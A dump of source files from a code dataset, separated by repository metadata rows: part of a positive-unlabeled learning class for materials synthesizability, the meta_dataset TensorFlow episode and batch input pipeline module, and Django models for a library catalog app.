scores_rp = np.zeros(shape=(repeats,))
labels = np.zeros(shape=(X_U.shape[0],))
for i in range(repeats):
prob_U_rp[:,i] = prob_U[:,i * splits:(i+1) * splits].mean(axis=1)
feat_rank_rp[:,i] = feat_rank[:, i * splits:(i+1) * splits].mean(axis=1)
tpr_rp[i] = tprs[i * splits:(i+1) * splits].mean()
scores_rp[i] = scores[i * splits:(i+1) * splits].mean()
label_U_rp[np.where(prob_U_rp > 0.5)] = 1
prob = prob_U_rp.mean(axis=1)
labels[np.where(prob > 0.5)] = 1
# Get confidence interval of TPR for each kfold
tpr_low, tpr_up = self.bootstrapCI(tpr_rp)
scores_low, scores_up = self.bootstrapCI(scores_rp)
# PU learning metrics
metrics = np.asarray([tpr_rp.mean(), tpr_low, tpr_up,
scores_rp.mean(), scores_low, scores_up])
print("Accuracy: %0.2f" % (tpr_rp.mean()))
print("95%% confidence interval: [%0.2f, %0.2f]" % (tpr_low, tpr_up))
# Metrics and results from training / testing
pu_stats = {'prob': prob, 'labels': labels, 'metrics': metrics,
'prob_rp': prob_U_rp, 'label_rp': label_U_rp,
'tpr_rp': tpr_rp, 'scores_rp': scores_rp,
'feat_rank_rp': feat_rank_rp}
# Save results
if filename:
if filename.endswith(".json"):
dumpfn(pu_stats, filename)
if filename.endswith(".pkl"):
with open(filename, 'wb') as file:
pickle.dump(pu_stats, file, protocol=pickle.HIGHEST_PROTOCOL)
self.pu_stats = pu_stats
return pu_stats
def bootstrapCI(self, data, ci=95, ns=10000):
"""Compute confidence interval of the TPR.
Args:
data (array): Array of TPRs for each kfold.
ci (int): Confidence interval.
ns (int): Number of bootstrap resamplings.
Returns:
lower (float): Lower endpoint of CI.
upper (float): Upper endpoint of CI.
"""
bs_rsample = []
for _ in range(ns):
rsample = resample(data, n_samples=len(data))
bs_rsample.append(np.mean(rsample))
bs_rsample = np.asarray(bs_rsample)
lower = np.percentile(bs_rsample, (100 - ci) / 2)
upper = np.percentile(bs_rsample, ci + (100 - ci) / 2)
return lower, upper
def corr_heatmap(self, pu_stats, num_feats=10, fname=''):
"""Plot correlation matrix between synthesizability and features.
cv_baggingDT must be run first.
Args:
pu_stats (dict): Output from cv_baggingDT.
num_feats (int): How many features to consider.
fname (str): Filename if correlation plot should be saved.
Returns:
None (generates plots)
"""
df_U = self.df_U
df_U_copy = df_U.drop(columns=['PU_label'])
# Get normalized, sorted & ranked list of most important features
synth_scores = self.pu_stats['prob']
df_U_copy['synth_score'] = synth_scores
# Make correlation matrix of top "num_feats" features
corrmat = df_U_copy.corr()
cols = corrmat.nlargest(num_feats, 'synth_score')['synth_score'].index
cm = np.corrcoef(df_U_copy[cols].values.T)
fig, ax = plt.subplots(1,1)
hm = sns.heatmap(cm, ax=ax, cbar=True, annot=True, square=True, fmt='.2f',annot_kws={'size': 7}, yticklabels=cols.values, xticklabels=cols.values)
if fname:
self.save_plot(fname + '.png', fig, ax)
def get_feat_importances(self, pu_stats, plot_format=''):
"""Process output from PU learning k-fold cross validation.
cv_baggingDT must be run first.
If plot_format is specified, a feature importance plot will
be saved.
Args:
pu_stats (dict): Output from PULearner.cv_baggingDT
plot_format (str): svg, png, or pdf file format for saving simple visualizations of feature importance and correlation.
"""
# Feature importances for individual repetitions of kfold CV
feat_rank_rp = pu_stats['feat_rank_rp']
feat_importances = np.sum(feat_rank_rp, axis=1)
df_U = self.df_U
df_U = df_U._get_numeric_data()
df_U_copy = df_U.drop(columns=['PU_label'])
feat_names = df_U_copy.columns
# Index corresponds to feature in original data
df_feat = pd.DataFrame(columns=['feature', 'importance'])
df_feat['feature'] = feat_names
df_feat['importance'] = feat_importances
# Sort by importance
df_feat_sort = df_feat.sort_values(by='importance', ascending=False)
max_value = df_feat['importance'].max()
# Normalize to 1
df_feat_sort['importance'] = df_feat_sort['importance'] / max_value
# Set feature importance attribute
self.feat_importances = df_feat
if plot_format in ['svg', 'pdf', 'png']:
# Feature importance plot
fig, ax = plt.subplots(figsize=(10,4))
with sns.axes_style(style='ticks'):
sns.barplot(x='feature', y='importance', data=df_feat_sort)
ax.set_xticklabels(ax.get_xticklabels(), rotation=45, ha="right", fontsize=7)
filename = 'feat_importance.' + plot_format
self.save_plot(filename, fig, ax)
@staticmethod
def _process_pu_data(data):
"""Utility method for processing input data.
Args:
data (DataFrame): Data with positive and unlabeled samples.
Returns:
X_P (array): Positive sample set.
X_U (array): Unlabeled sample set.
"""
df_P = data.query("PU_label == 1") # Positive value is 1
df_U = data.query("PU_label == 0") # Unlabeled value is 0
# Chop off PU label and drop non-numeric columns for sklearn
X_P = np.asarray(df_P._get_numeric_data())[:,:-1]
X_U = np.asarray(df_U._get_numeric_data())[:,:-1]
return df_P, df_U, X_P, X_U
@staticmethod
def save_plot(filename, fig, ax):
"""Utility method for saving simple visualizations.
Args:
filename (str): Name ending in .svg, .png, or .pdf
fig, ax (objects): Matplotlib objects.
Returns:
None
"""
sns.set_style('ticks')
fig.tight_layout()
fig.savefig(filename)
class PUInteract():
def __init__(self, df_parent, pu_parent, df_child, pu_child, merge_on=(), feats=()):
"""Consider parent and child phase PU learning scores.
This class looks at PU learning scores for parent bulk
compounds (e.g. layered h-BN) and scores of the child phases
along with descriptors like exfoliation energy and changes
in structural/electronic properties to predict (parent, child)
pairs that can be synthesized.
Parent and child must be linked by a column that allows the dataframes to be merged. There should also be additional features that characterize the structural and chemical differences between parents and children, e.g. changes in bond lengths, etc.
Unsupervised clustering models are used to identify synthesizable (parent/child) pairs.
Args:
df_parent (str): Parent data filename.
pu_parent (dict): Output from PULearner.cv_baggingDT.
df_child (str): Child data filename.
pu_child (dict): Output from PULearner.cv_baggingDT.
merge_on (tuple): Column name(s) on which to merge.
feats (tuple): Column names to use as features. If empty, use all possible columns.
Attributes:
merged_df (DataFrame): (Parent, child) pair data.
X (array): Array representation of merged_df.
Returns:
None
"""
df_parent = pd.read_json(df_parent)
df_child = pd.read_json(df_child)
# Set scores from PULearner
df_parent['synth_score'] = 1
df_child['synth_score'] = 1
df_parent.loc[df_parent.eval('PU_label == 0'), 'synth_score'] = pu_parent['prob']
df_child.loc[df_child.eval('PU_label == 0'), 'synth_score'] = pu_child['prob']
# Merge parent and child dfs
merge_on = list(merge_on)
df = pd.merge(df_parent, df_child, on=merge_on, how='outer', suffixes=['_p','_c'])
df.drop(columns=['PU_label_p', 'PU_label_c'], inplace=True, axis=1)
if feats:
feat_names = [f + '_p' for f in feats] + [f + '_c' for f in feats]
df = df[feat_names]
self.merged_df = df
self.X = np.array(df)
def do_kmeans(self, n_clusters=2, seed=42):
"""Do k-means clustering on (parent, child) pairs.
Args:
n_clusters (int): Number of clusters.
seed (int): Fix random seed for kmeans reproducibility.
Returns:
kmeans_output (dict): kmeans cluster centers, cluster labels for each (parent, child)
"""
np.random.seed(seed)
km = KMeans(n_clusters=n_clusters, random_state=seed)
km.fit(self.X)
kmeans_output = {'cluster_centers': km.cluster_centers_,
'cluster_labels': km.labels_}
return kmeans_output
def do_gmixture(self, n_components=2, seed=42):
"""
Estimate parameters of a Gaussian mixture distribution of (parent, child) data.
Args:
n_components (int): Number of components in GMM.
seed (int): Random seed.
Returns:
gmm_output (dict): Predicted labels of (parent, child) pairs and predicted posterior probabilities of each component.
"""
np.random.seed(seed)
gmm = GaussianMixture(n_components=n_components, random_state=seed, covariance_type='full')
gmm.fit(self.X)
gmm_labels = gmm.predict(self.X)
gmm_prob = gmm.predict_proba(self.X)[:,0]
gmm_output = {'gmm_labels': gmm_labels, 'gmm_prob': gmm_prob}
return gmm_output
def do_bgm(self, n_components=6, seed=42):
"""Bayesian Gaussian Mixture.
Infer the effective number of components in a Gaussian Mixture Model via variational Bayesian estimation.
n_effective_componenents < n_components if the model sets some weights close to 0.
Args:
n_components (int): Number of components in GMM.
seed (int): Random seed.
Returns:
bgm_output (dict): Labels and probabilities.
"""
np.random.seed(seed)
bgm = BayesianGaussianMixture(n_components=n_components, covariance_type='full', weight_concentration_prior=1e-2, weight_concentration_prior_type='dirichlet_process', mean_precision_prior=1e-2, init_params='random', max_iter=100, random_state=seed)
bgm.fit(self.X)
bgm_labels = bgm.predict(self.X)
bgm_prob = bgm.predict_proba(self.X)[:,0]
bgm_output = {'bgm_labels': bgm_labels, 'bgm_prob': bgm_prob}
return bgm_output
|
[
"[email protected]"
] | |
44ef8859d033e58a0a9a56f33e20576e31bb6668
|
85310673ac3e45956dfa904fe7fecf5d6c57bfee
|
/meta_dataset/data/pipeline.py
|
df807be9e188307ec47e3ac59bc901316c82b46e
|
[
"Apache-2.0"
] |
permissive
|
ebadrian/meta_dataset
|
c994f15a4cda2bf8e5b51539b174184a3269e5eb
|
bd40ec4486de165fa6f4ca9fe839e1f685a0ee27
|
refs/heads/main
| 2023-01-23T18:59:36.501160 | 2020-12-04T23:49:08 | 2020-12-04T23:49:08 | 318,241,469 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 25,065 |
py
|
# coding=utf-8
# Copyright 2020 The Meta-Dataset Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""This module assembles full input data pipelines.
The whole pipeline incorporate (potentially) multiple Readers, the logic to
select between them, and the common logic to extract support / query sets if
needed, decode the example strings, and resize the images.
"""
# TODO(lamblinp): Organize the make_*_pipeline functions into classes, and
# make them output Batch or EpisodeDataset objects directly.
# TODO(lamblinp): Update variable names to be more consistent
# - target, class_idx, label
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl import logging
import gin.tf
from meta_dataset import data
from meta_dataset.data import decoder
from meta_dataset.data import learning_spec
from meta_dataset.data import reader
from meta_dataset.data import sampling
from six.moves import zip
import tensorflow.compat.v1 as tf
def filter_dummy_examples(example_strings, class_ids):
"""Returns tensors with only actual examples, filtering out the dummy ones.
Actual examples are the first ones in the tensors, and followed by dummy ones,
indicated by negative class IDs.
Args:
example_strings: 1-D Tensor of dtype str, Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset, except for negative ones, that indicate dummy examples).
"""
num_actual = tf.reduce_sum(tf.cast(class_ids >= 0, tf.int32))
actual_example_strings = example_strings[:num_actual]
actual_class_ids = class_ids[:num_actual]
return (actual_example_strings, actual_class_ids)
def log_data_augmentation(data_augmentation, name):
"""Logs the given data augmentation parameters for diagnostic purposes."""
if not data_augmentation:
logging.info('No data augmentation provided for %s', name)
else:
logging.info('%s augmentations:', name)
logging.info('enable_jitter: %s', data_augmentation.enable_jitter)
logging.info('jitter_amount: %d', data_augmentation.jitter_amount)
logging.info('enable_gaussian_noise: %s',
data_augmentation.enable_gaussian_noise)
logging.info('gaussian_noise_std: %s', data_augmentation.gaussian_noise_std)
def flush_and_chunk_episode(example_strings, class_ids, chunk_sizes):
"""Removes flushed examples from an episode and chunks it.
This function:
1) splits the batch of examples into a "flush" chunk and some number of
additional chunks (as determined by `chunk_sizes`),
2) throws away the "flush" chunk, and
3) removes the padded dummy examples from the additional chunks.
For example, in the context of few-shot learning, where episodes are composed
of a support set and a query set, `chunk_size = (150, 100, 50)` would be
interpreted as describing a "flush" chunk of size 150, a "support" chunk of
size 100, and a "query" chunk of size 50.
Args:
example_strings: 1-D Tensor of dtype str, tf.train.Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
chunk_sizes: tuple of ints representing the sizes of the flush and
additional chunks.
Returns:
A tuple of episode chunks of the form `((chunk_0_example_strings,
chunk_0_class_ids), (chunk_1_example_strings, chunk_1_class_ids), ...)`.
"""
example_strings_chunks = tf.split(
example_strings, num_or_size_splits=chunk_sizes)[1:]
class_ids_chunks = tf.split(class_ids, num_or_size_splits=chunk_sizes)[1:]
return tuple(
filter_dummy_examples(strings, ids)
for strings, ids in zip(example_strings_chunks, class_ids_chunks))
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_dumped_episode(support_strings, query_strings, image_size,
support_decoder, query_decoder):
"""Processes a dumped episode.
This function is almost like `process_episode()` function, except:
- It doesn't need to call flush_and_chunk_episode().
- And the labels are read from the tf.Example directly. We assume that
labels are already mapped in to [0, n_ways - 1].
Args:
support_strings: 1-D Tensor of dtype str, Example protocol buffers of
support set.
query_strings: 1-D Tensor of dtype str, Example protocol buffers of query
set.
image_size: int, desired image size used during decoding.
support_decoder: ImageDecoder, used to decode support set images.
query_decoder: ImageDecoder, used to decode query set images.
Returns:
support_images, support_labels, support_labels, query_images,
query_labels, query_labels: Tensors, batches of images, labels, and
labels, for the support and query sets (respectively). We return labels
twice since dumped datasets doesn't have (absolute) class IDs anymore.
"""
if isinstance(support_decoder, decoder.ImageDecoder):
log_data_augmentation(support_decoder.data_augmentation, 'support')
support_decoder.image_size = image_size
else:
raise TypeError('support_decoder type: %s is not ImageDecoder' %
type(support_decoder))
if isinstance(query_decoder, decoder.ImageDecoder):
log_data_augmentation(query_decoder.data_augmentation, 'query')
query_decoder.image_size = image_size
else:
raise TypeError('query_decoder type: %s is not ImageDecoder' %
type(query_decoder))
support_decoder.image_size = image_size
query_decoder.image_size = image_size
support_images, support_labels = tf.map_fn(
support_decoder.decode_with_label,
support_strings,
dtype=(support_decoder.out_type, tf.int32),
back_prop=False)
query_images, query_labels = tf.map_fn(
support_decoder.decode_with_label,
query_strings,
dtype=(support_decoder.out_type, tf.int32),
back_prop=False)
return (support_images, support_labels, support_labels, query_images,
query_labels, query_labels)
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_episode(example_strings, class_ids, chunk_sizes, image_size,
support_decoder, query_decoder):
"""Processes an episode.
This function:
1) splits the batch of examples into "flush", "support", and "query" chunks,
2) throws away the "flush" chunk,
3) removes the padded dummy examples from the "support" and "query" chunks,
4) extracts and processes images out of the example strings, and
5) builds support and query targets (numbers from 0 to K-1 where K is the
number of classes in the episode) from the class IDs.
Args:
example_strings: 1-D Tensor of dtype str, tf.train.Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
chunk_sizes: Tuple of ints representing the sizes the flush and additional
chunks.
image_size: int, desired image size used during decoding.
support_decoder: Decoder, used to decode support set images.
query_decoder: Decoder, used to decode query set images.
Returns:
support_images, support_labels, support_class_ids, query_images,
query_labels, query_class_ids: Tensors, batches of images, labels, and
(absolute) class IDs, for the support and query sets (respectively).
"""
# TODO(goroshin): Replace with `support_decoder.log_summary(name='support')`.
# TODO(goroshin): Eventually remove setting the image size here and pass it
# to the ImageDecoder constructor instead.
if isinstance(support_decoder, decoder.ImageDecoder):
log_data_augmentation(support_decoder.data_augmentation, 'support')
support_decoder.image_size = image_size
if isinstance(query_decoder, decoder.ImageDecoder):
log_data_augmentation(query_decoder.data_augmentation, 'query')
query_decoder.image_size = image_size
(support_strings, support_class_ids), (query_strings, query_class_ids) = \
flush_and_chunk_episode(example_strings, class_ids, chunk_sizes)
support_images = tf.map_fn(
support_decoder,
support_strings,
dtype=support_decoder.out_type,
back_prop=False)
query_images = tf.map_fn(
query_decoder,
query_strings,
dtype=query_decoder.out_type,
back_prop=False)
# Convert class IDs into labels in [0, num_ways).
_, support_labels = tf.unique(support_class_ids)
_, query_labels = tf.unique(query_class_ids)
return (support_images, support_labels, support_class_ids, query_images,
query_labels, query_class_ids)
@gin.configurable(whitelist=['batch_decoder'])
def process_batch(example_strings, class_ids, image_size, batch_decoder):
"""Processes a batch.
This function:
1) extracts and processes images out of the example strings.
2) builds targets from the class ID and offset.
Args:
example_strings: 1-D Tensor of dtype str, Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
image_size: int, desired image size used during decoding.
batch_decoder: Decoder class instance for the batch.
Returns:
images, labels: Tensors, a batch of image and labels.
"""
# TODO(goroshin): Replace with `batch_decoder.log_summary(name='support')`.
if isinstance(batch_decoder, decoder.ImageDecoder):
log_data_augmentation(batch_decoder.data_augmentation, 'batch')
batch_decoder.image_size = image_size
images = tf.map_fn(
batch_decoder,
example_strings,
dtype=batch_decoder.out_type,
back_prop=False)
labels = class_ids
return (images, labels)
def make_one_source_episode_pipeline(dataset_spec,
use_dag_ontology,
use_bilevel_ontology,
split,
episode_descr_config,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from one single source as Episodes.
Args:
dataset_spec: A DatasetSpecification object defining what to read from.
use_dag_ontology: Whether to use source's ontology in the form of a DAG to
sample episodes classes.
use_bilevel_ontology: Whether to use source's bilevel ontology (consisting
of superclasses and subclasses) to sample episode classes.
split: A learning_spec.Split object identifying the source (meta-)split.
episode_descr_config: An instance of EpisodeDescriptionConfig containing
parameters relating to sampling shots and ways for episodes.
pool: String (optional), for example-split datasets, which example split to
use ('train', 'valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, an int specifying a number of elements to pick from
each class' tfrecord. If specified, the available images of each class
will be restricted to that int. By default no restriction is applied and
all data is used.
Returns:
A Dataset instance that outputs tuples of fully-assembled and decoded
episodes zipped with the ID of their data source of origin.
"""
use_all_classes = False
if pool is not None:
if not data.POOL_SUPPORTED:
raise NotImplementedError('Example-level splits or pools not supported.')
if num_to_take is None:
num_to_take = -1
episode_reader = reader.EpisodeReader(dataset_spec, split,
shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take)
sampler = sampling.EpisodeDescriptionSampler(
episode_reader.dataset_spec,
split,
episode_descr_config,
pool=pool,
use_dag_hierarchy=use_dag_ontology,
use_bilevel_hierarchy=use_bilevel_ontology,
use_all_classes=use_all_classes)
dataset = episode_reader.create_dataset_input_pipeline(sampler, pool=pool)
# Episodes coming out of `dataset` contain flushed examples and are internally
# padded with dummy examples. `process_episode` discards flushed examples,
# splits the episode into support and query sets, removes the dummy examples
# and decodes the example strings.
chunk_sizes = sampler.compute_chunk_sizes()
map_fn = functools.partial(
process_episode, chunk_sizes=chunk_sizes, image_size=image_size)
dataset = dataset.map(map_fn)
# There is only one data source, so we know that all episodes belong to it,
# but for interface consistency, zip with a dataset identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(0).repeat()
dataset = tf.data.Dataset.zip((dataset, source_id_dataset))
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
def make_multisource_episode_pipeline(dataset_spec_list,
use_dag_ontology_list,
use_bilevel_ontology_list,
split,
episode_descr_config,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from multiple sources as Episodes.
Each episode only contains data from one single source. For each episode, its
source is sampled uniformly across all sources.
Args:
dataset_spec_list: A list of DatasetSpecification, one for each source.
use_dag_ontology_list: A list of Booleans, one for each source: whether to
use that source's DAG-structured ontology to sample episode classes.
use_bilevel_ontology_list: A list of Booleans, one for each source: whether
to use that source's bi-level ontology to sample episode classes.
split: A learning_spec.Split object identifying the sources split. It is the
same for all datasets.
episode_descr_config: An instance of EpisodeDescriptionConfig containing
parameters relating to sampling shots and ways for episodes.
pool: String (optional), for example-split datasets, which example split to
use ('train', 'valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, a list specifying for each dataset the number of
examples per class to restrict to (for this given split). If provided, its
length must be the same as len(dataset_spec). If None, no restrictions are
applied to any dataset and all data per class is used.
Returns:
A Dataset instance that outputs tuples of fully-assembled and decoded
episodes zipped with the ID of their data source of origin.
"""
if pool is not None:
if not data.POOL_SUPPORTED:
raise NotImplementedError('Example-level splits or pools not supported.')
if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
raise ValueError('num_to_take does not have the same length as '
'dataset_spec_list.')
if num_to_take is None:
num_to_take = [-1] * len(dataset_spec_list)
sources = []
for source_id, (dataset_spec, use_dag_ontology, use_bilevel_ontology,
num_to_take_for_dataset) in enumerate(
zip(dataset_spec_list, use_dag_ontology_list,
use_bilevel_ontology_list, num_to_take)):
episode_reader = reader.EpisodeReader(dataset_spec, split,
shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take_for_dataset)
sampler = sampling.EpisodeDescriptionSampler(
episode_reader.dataset_spec,
split,
episode_descr_config,
pool=pool,
use_dag_hierarchy=use_dag_ontology,
use_bilevel_hierarchy=use_bilevel_ontology)
dataset = episode_reader.create_dataset_input_pipeline(sampler, pool=pool)
# Create a dataset to zip with the above for identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(source_id).repeat()
sources.append(tf.data.Dataset.zip((dataset, source_id_dataset)))
# Sample uniformly among sources.
dataset = tf.data.experimental.sample_from_datasets(sources)
# Episodes coming out of `dataset` contain flushed examples and are internally
# padded with dummy examples. `process_episode` discards flushed examples,
# splits the episode into support and query sets, removes the dummy examples
# and decodes the example strings.
chunk_sizes = sampler.compute_chunk_sizes()
def map_fn(episode, source_id):
return process_episode(
*episode, chunk_sizes=chunk_sizes, image_size=image_size), source_id
dataset = dataset.map(map_fn)
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
def make_one_source_batch_pipeline(dataset_spec,
split,
batch_size,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from one single source as Batches.
Args:
dataset_spec: A DatasetSpecification object defining what to read from.
split: A learning_spec.Split object identifying the source split.
batch_size: An int representing the max number of examples in each batch.
pool: String (optional), for example-split datasets, which example split to
use ('valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, number of examples in the buffer used for
shuffling the examples from different classes, while they are mixed
together. There is only one shuffling operation, not one per class.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, an int specifying a number of elements to pick from
each class' tfrecord. If specified, the available images of each class
will be restricted to that int. By default no restriction is applied and
all data is used.
Returns:
A Dataset instance that outputs decoded batches from all classes in the
split.
"""
if num_to_take is None:
num_to_take = -1
batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take)
dataset = batch_reader.create_dataset_input_pipeline(
batch_size=batch_size, pool=pool)
map_fn = functools.partial(process_batch, image_size=image_size)
dataset = dataset.map(map_fn)
# There is only one data source, so we know that all batches belong to it,
# but for interface consistency, zip with a dataset identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(0).repeat()
dataset = tf.data.Dataset.zip((dataset, source_id_dataset))
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
# TODO(lamblinp): Update this option's name
@gin.configurable('BatchSplitReaderGetReader', whitelist=['add_dataset_offset'])
def make_multisource_batch_pipeline(dataset_spec_list,
split,
batch_size,
add_dataset_offset,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from multiple source as Batches.
Args:
dataset_spec_list: A list of DatasetSpecification, one for each source.
split: A learning_spec.Split object identifying the source split.
batch_size: An int representing the max number of examples in each batch.
add_dataset_offset: A Boolean, whether to add an offset to each dataset's
targets, so that each target is unique across all datasets.
pool: String (optional), for example-split datasets, which example split to
use ('valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, number of examples in the buffer used for
shuffling the examples from different classes, while they are mixed
together. There is only one shuffling operation, not one per class.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, a list specifying for each dataset the number of
examples per class to restrict to (for this given split). If provided, its
length must be the same as len(dataset_spec). If None, no restrictions are
applied to any dataset and all data per class is used.
Returns:
A Dataset instance that outputs decoded batches from all classes in the
split.
"""
if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
raise ValueError('num_to_take does not have the same length as '
'dataset_spec_list.')
if num_to_take is None:
num_to_take = [-1] * len(dataset_spec_list)
sources = []
offset = 0
for source_id, (dataset_spec, num_to_take_for_dataset) in enumerate(
zip(dataset_spec_list, num_to_take)):
batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take_for_dataset)
dataset = batch_reader.create_dataset_input_pipeline(
batch_size=batch_size, pool=pool, offset=offset)
# Create a dataset to zip with the above for identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(source_id).repeat()
sources.append(tf.data.Dataset.zip((dataset, source_id_dataset)))
if add_dataset_offset:
offset += len(dataset_spec.get_classes(split))
# Sample uniformly among sources
dataset = tf.data.experimental.sample_from_datasets(sources)
def map_fn(batch, source_id):
return process_batch(*batch, image_size=image_size), source_id
dataset = dataset.map(map_fn)
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
|
[
"[email protected]"
] | |
e6f10d75225da6821b418260301e574f90c67f2f
|
0e1f38e205ce9a8fe2dd848cc81e29fe6bcf315e
|
/catalog/models.py
|
3b40f62ac087da15a99bf416c6d706bb9b83b93c
|
[] |
no_license
|
TimothySeahGit/django-library-test
|
c62f49a31a0e86449771d84e135a687f5e685f0f
|
fc4d3d7c86aab645c3faef270dc01fe995e9ba6b
|
refs/heads/master
| 2022-12-14T07:38:21.618018 | 2019-05-28T03:47:42 | 2019-05-28T03:47:42 | 188,566,746 | 0 | 0 | null | 2022-12-08T05:10:31 | 2019-05-25T12:59:47 |
Python
|
UTF-8
|
Python
| false | false | 4,427 |
py
|
# Used to generate URLs by reversing the URL patterns
import uuid # Required for unique book instances
from django.urls import reverse
from django.db import models
from django.contrib.auth.models import User
from datetime import date
# Create your models here.
class Genre(models.Model):
"""Model representing a book genre."""
name = models.CharField(
max_length=200, help_text='Enter a book genre (e.g. Science Fiction)')
def __str__(self):
"""String for representing the Model object."""
return self.name
class Language(models.Model):
"""Model representing a Language (e.g. English, French, Japanese, etc.)"""
name = models.CharField(max_length=200,
help_text="Enter the book's natural language (e.g. English, French, Japanese etc.)")
def __str__(self):
"""String for representing the Model object (in Admin site etc.)"""
return self.name
class Book(models.Model):
"""Model representing a book (but not a specific copy of a book)."""
title = models.CharField(max_length=200)
# Foreign Key used because book can only have one author, but authors can have multiple books
# Author as a string rather than object because it hasn't been declared yet in the file
author = models.ForeignKey('Author', on_delete=models.SET_NULL, null=True)
summary = models.TextField(
max_length=1000, help_text='Enter a brief description of the book')
isbn = models.CharField(
'ISBN', max_length=13, help_text='13 Character <a href="https://www.isbn-international.org/content/what-isbn">ISBN number</a>')
# ManyToManyField used because genre can contain many books. Books can cover many genres.
# Genre class has already been defined so we can specify the object above.
genre = models.ManyToManyField(
Genre, help_text='Select a genre for this book')
language = models.ForeignKey(
'Language', on_delete=models.SET_NULL, null=True)
def __str__(self):
"""String for representing the Model object."""
return self.title
def get_absolute_url(self):
"""Returns the url to access a detail record for this book."""
return reverse('book-detail', args=[str(self.id)])
def display_genre(self):
"""Create a string for the Genre. This is required to display genre in Admin."""
return ', '.join(genre.name for genre in self.genre.all()[:3])
display_genre.short_description = 'Genre'
class BookInstance(models.Model):
"""Model representing a specific copy of a book (i.e. that can be borrowed from the library)."""
id = models.UUIDField(primary_key=True, default=uuid.uuid4,
help_text='Unique ID for this particular book across whole library')
book = models.ForeignKey('Book', on_delete=models.SET_NULL, null=True)
imprint = models.CharField(max_length=200)
due_back = models.DateField(null=True, blank=True)
borrower = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, blank=True)
LOAN_STATUS = (
('m', 'Maintenance'),
('o', 'On loan'),
('a', 'Available'),
('r', 'Reserved'),
)
status = models.CharField(
max_length=1,
choices=LOAN_STATUS,
blank=True,
default='m',
help_text='Book availability',
)
class Meta:
ordering = ['due_back']
permissions = (("can_mark_returned", "Set book as returned"),)
def __str__(self):
"""String for representing the Model object."""
return f'{self.id} ({self.book.title})'
@property
def is_overdue(self):
if self.due_back and date.today() > self.due_back:
return True
return False
class Author(models.Model):
"""Model representing an author."""
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
date_of_birth = models.DateField(null=True, blank=True)
date_of_death = models.DateField('died', null=True, blank=True)
class Meta:
ordering = ['last_name', 'first_name']
def get_absolute_url(self):
"""Returns the url to access a particular author instance."""
return reverse('author-detail', args=[str(self.id)])
def __str__(self):
"""String for representing the Model object."""
return f'{self.last_name}, {self.first_name}'
|
[
"[email protected]"
] | |
5819b270315da9ad336332e32b0db0c3aa3325a1
|
f55e6d86adc4155e99f8a2047a297cf0b3277616
|
/manager.py
|
a7756f495ef2b167481f9379d160f8e6033ba998
|
[] |
no_license
|
DengZY123/sunners
|
1d87fdef3abda2c814a9ae587e4cf03a9ac23263
|
46b822fe915b2559df407126951db73857844537
|
